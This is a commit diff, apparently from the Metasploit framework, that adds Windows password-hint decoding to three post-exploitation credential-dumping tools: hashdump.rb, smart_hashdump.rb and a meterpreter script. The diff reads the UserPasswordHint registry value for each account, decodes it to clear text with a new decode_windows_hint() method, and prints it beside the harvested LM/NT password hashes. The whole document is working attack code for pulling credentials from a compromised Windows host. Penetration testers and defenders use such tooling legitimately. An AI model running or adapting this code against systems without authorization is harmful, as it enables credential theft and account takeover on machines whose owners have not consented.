Adding Windows User Password Hint Decoding to Hashdump Tools
* UserPasswordHint, a key that is used to store the users password hint, can be easily decoded to clear-text to get the users hint (Example: "My Favorite Color") * Added decode_windows_hint() method to perform the decode process * Added decoded hint output for hashdump.rb and smart_hashdump.rbunstable
Jonathan Claudius
parent
f46545db58
commit
fbc36b57d0
|
|
@ -87,6 +87,12 @@ class Metasploit3 < Msf::Post
|
|||
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
|
||||
:type => "smb_hash"
|
||||
)
|
||||
|
||||
#If we have a hint, decode and add to the hashstring
|
||||
if !users[rid][:UserPasswordHint].nil?
|
||||
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
|
||||
end
|
||||
|
||||
print_line hashstring
|
||||
end
|
||||
print_line()
|
||||
|
|
@ -164,6 +170,13 @@ class Metasploit3 < Msf::Post
|
|||
users[usr.to_i(16)] ||={}
|
||||
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
||||
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
||||
|
||||
begin
|
||||
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[usr.to_i(16)][:UserPasswordHint] = nil
|
||||
end
|
||||
|
||||
uk.close
|
||||
end
|
||||
ok.close
|
||||
|
|
@ -205,6 +218,15 @@ class Metasploit3 < Msf::Post
|
|||
users
|
||||
end
|
||||
|
||||
def decode_windows_hint(e_string)
|
||||
d_string = ""
|
||||
e_string.scan(/..../).each do |chunk|
|
||||
bytes = chunk.scan(/../)
|
||||
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
|
||||
end
|
||||
d_string
|
||||
end
|
||||
|
||||
def convert_des_56_to_64(kstr)
|
||||
key = []
|
||||
str = kstr.unpack("C*")
|
||||
|
|
|
|||
|
|
@ -140,6 +140,13 @@ class Metasploit3 < Msf::Post
|
|||
users[usr.to_i(16)] ||={}
|
||||
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
||||
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
||||
|
||||
begin
|
||||
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[usr.to_i(16)][:UserPasswordHint] = nil
|
||||
end
|
||||
|
||||
uk.close
|
||||
end
|
||||
ok.close
|
||||
|
|
@ -183,6 +190,16 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
|
||||
def decode_windows_hint(e_string)
|
||||
d_string = ""
|
||||
e_string.scan(/..../).each do |chunk|
|
||||
bytes = chunk.scan(/../)
|
||||
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
|
||||
end
|
||||
d_string
|
||||
end
|
||||
#-------------------------------------------------------------------------------
|
||||
|
||||
def convert_des_56_to_64(kstr)
|
||||
key = []
|
||||
str = kstr.unpack("C*")
|
||||
|
|
@ -279,7 +296,14 @@ class Metasploit3 < Msf::Post
|
|||
# next if guest account or support account
|
||||
next if rid == 501 or rid == 1001
|
||||
collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
|
||||
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
|
||||
|
||||
#If we have a hint, decode and populate hint_string
|
||||
hint_string = ""
|
||||
if !users[rid][:UserPasswordHint].nil?
|
||||
hint_string += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
|
||||
end
|
||||
|
||||
print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::#{hint_string}")
|
||||
session.framework.db.report_auth_info(
|
||||
:host => host,
|
||||
:port => @smb_port,
|
||||
|
|
|
|||
|
|
@ -101,6 +101,13 @@ def capture_user_keys
|
|||
users[usr.to_i(16)] ||={}
|
||||
users[usr.to_i(16)][:F] = uk.query_value("F").data
|
||||
users[usr.to_i(16)][:V] = uk.query_value("V").data
|
||||
|
||||
begin
|
||||
users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
|
||||
rescue ::Rex::Post::Meterpreter::RequestError
|
||||
users[usr.to_i(16)][:UserPasswordHint] = nil
|
||||
end
|
||||
|
||||
uk.close
|
||||
end
|
||||
ok.close
|
||||
|
|
@ -142,6 +149,15 @@ def decrypt_user_keys(hbootkey, users)
|
|||
users
|
||||
end
|
||||
|
||||
def decode_windows_hint(e_string)
|
||||
d_string = ""
|
||||
e_string.scan(/..../).each do |chunk|
|
||||
bytes = chunk.scan(/../)
|
||||
d_string += (bytes[1] + bytes[0]).to_s.hex.chr
|
||||
end
|
||||
d_string
|
||||
end
|
||||
|
||||
def convert_des_56_to_64(kstr)
|
||||
key = []
|
||||
str = kstr.unpack("C*")
|
||||
|
|
@ -239,7 +255,14 @@ if client.platform =~ /win32|win64/
|
|||
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
|
||||
:type => "smb_hash"
|
||||
)
|
||||
|
||||
#If we have a hint, decode and add to the hashstring
|
||||
if !users[rid][:UserPasswordHint].nil?
|
||||
hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
|
||||
end
|
||||
|
||||
print_line hashstring
|
||||
|
||||
end
|
||||
print_line()
|
||||
print_line()
|
||||
|
|
|
|||
Loading…
Reference in New Issue